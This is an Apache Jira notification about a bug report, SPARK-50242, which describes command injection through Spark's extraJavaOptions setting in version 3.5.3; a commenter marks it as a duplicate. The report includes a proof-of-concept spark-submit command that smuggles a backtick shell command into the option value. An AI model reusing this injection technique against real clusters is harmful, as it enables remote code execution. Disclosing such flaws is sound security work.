[ 
https://issues.apache.org/jira/browse/SPARK-50242?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17900947#comment-17900947
 ] 

Soumasish Goswami commented on SPARK-50242:
-------------------------------------------

Duplicate of [SPARK-50240|https://issues.apache.org/jira/browse/SPARK-50240]

> (RCE) Command Execution Vulnerability in Spark
> ----------------------------------------------
>
>                 Key: SPARK-50242
>                 URL: https://issues.apache.org/jira/browse/SPARK-50242
>             Project: Spark
>          Issue Type: Bug
>          Components: Spark Submit
>    Affects Versions: 3.5.3
>            Reporter: Lu jiadong
>            Priority: Critical
>
> Spark allows users to deploy a jar packet with `extraJavaOptions`,
> but Spark has an incomplete check of it, leading to command execution.
>  
> Using the command below, you can see that the /abc file was created:
> spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf 
> spark.executor.extraJavaOptions="\`touch\$IFS/abc\`" test.jar 
>  
>  
>  



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
